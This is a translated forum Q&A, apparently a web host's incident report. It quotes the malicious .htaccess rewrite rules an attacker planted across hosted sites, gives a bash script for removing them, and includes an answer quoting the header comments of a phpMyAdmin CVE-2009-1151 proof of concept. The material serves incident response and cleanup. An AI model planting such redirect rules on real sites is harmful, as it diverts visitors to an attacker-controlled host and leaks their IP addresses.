Bre*_*nt 6 security hacking .htaccess vulnerability apache-2.2
我们经营着一个托管大约 300 个网站的网络服务器群。
昨天早上,一个脚本将 www-data(apache 用户)拥有的 .htaccess 文件放置在大多数(但不是全部)站点的 document_root 下的每个目录中。
.htaccess 文件的内容是这样的:
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://
RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
RewriteRule . http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR}
谷歌搜索那个 url(这是“防病毒”的 md5 哈希)我发现同样的事情发生在整个互联网上,我正在寻找已经处理过这个问题的人,并确定了漏洞在哪里。
我已经搜索了我们的大部分日志,但还没有找到任何结论。有没有其他人经历过同样的事情,比我在查明漏洞方面做得更进一步?
到目前为止,我们已经确定:
任何更多提示将不胜感激。
==编辑==
对于那些需要它的人,这里是我用来清理 .htaccess 文件的脚本:
#!/bin/bash
PATT=84f6a4eef61784b33e4acbd32c8fdd72.com
DIR=/mnt
TMP=/tmp/`mktemp "XXXXXX"`
find $DIR -name .htaccess|while read FILE; do
if ( grep $PATT "$FILE" > /dev/null); then
if [ `cat "$FILE"|wc -l` -eq 4 ]; then
rm "$FILE"
else
if ( tail -n1 "$FILE"|grep $PATT > /dev/null ); then
rm $TMP
cp "$FILE" $TMP
LINES=`cat $TMP|wc -l`
GOODLINES=$(($LINES-4))
head -n $GOODLINES $TMP > "$FILE"
else
echo $FILE requires manual intervention
fi
fi
fi
done
phpMyAdmin存在漏洞
#!/bin/bash
# CVE-2009-1151:phpMyAdmin '/scripts/setup.php' PHP 代码注入 RCE PoC v0.11
# by pagvac (gnucitizen.org),2009 年 6 月 4 日。
# 特别感谢 Greg Ose (labs.neohapsis.com)为了发现如此酷的漏洞,
# 并访问 str0ke (milw0rm.com) 来测试这个 PoC 脚本并提供反馈!# PoC 脚本已在以下目标上成功测试:
# phpMyAdmin 2.11.4、2.11.9.3、2.11.9.4、3.0.0 和 3.0.1.1
# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)# 攻击要求:
# 1) 易受攻击的版本(显然!):2.11.9.5 之前的 2.11.x
# 和 3.1.3.1 之前的 3.x,根据 PMASA-2009-3
# 2) 看来这个漏洞只能针对环境进行利用
# 管理员选择按照向导方法安装 phpMyAdmin
,而不是手动方法:http ://snipurl.com/jhjxx
# 3) 管理员必须没有删除 '
/phpMyAdmin 中的'/config/' 目录/' 目录。这是因为这个目录是
# '/scripts/setup.php' 尝试创建 'config.inc.php' 的地方
# 我们的邪恶 PHP 代码被注入 8)# 更多信息:
# http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
# http://labs.neohapsis.com/2009/04/06/about-cve-2009- 1151/
| 归档时间: |
|
| 查看次数: |
821 次 |
| 最近记录: |